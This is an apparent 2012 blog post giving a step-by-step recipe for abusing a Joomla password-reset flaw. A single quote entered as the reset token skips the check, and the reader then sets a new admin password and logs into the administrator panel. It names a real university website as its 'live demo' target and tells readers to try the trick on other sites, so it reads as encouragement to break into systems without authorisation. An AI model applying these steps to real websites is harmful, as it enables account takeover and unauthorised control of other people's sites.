Joomla Password Reset vulnerability

Share this article :

Joomla Password Reset vulnerability : Explain with Live demo : 

website  : http://miit.unikl.edu.my/ 

The tricks is like this:

1. Go to http://miit.unikl.edu.my/index.php?option=com_user&view=reset&layout=confirm
then you will be prompt for a token in which the token is suppose already sent to your email,

2. Now, put a single quote ' into field text box "token" and Click OK.
The sql query then will be looks like this :
"SELECT id FROM jos_users WHERE block = 0 AND activation = '' "
3. Write new password for admin
4. Go to url : http://miit.unikl.edu.my/administrator/
5. Login admin with your new password

** update: miit joomla was patched.. Try any site else :P

Facebook Comments Plugin by Master cMs>

Do you like this post? Please link back to this article by copying one of the codes below.

URL Of Post:

https://systechict.blogspot.com/2012/08/joomla-password-reset-vulnerability.html

HTML Link Code:

<a href="https://systechict.blogspot.com/2012/08/joomla-password-reset-vulnerability.html">Joomla Password Reset vulnerability</a>

BB (forum) link code:

[url=https://systechict.blogspot.com/2012/08/joomla-password-reset-vulnerability.html]Joomla Password Reset vulnerability[/url]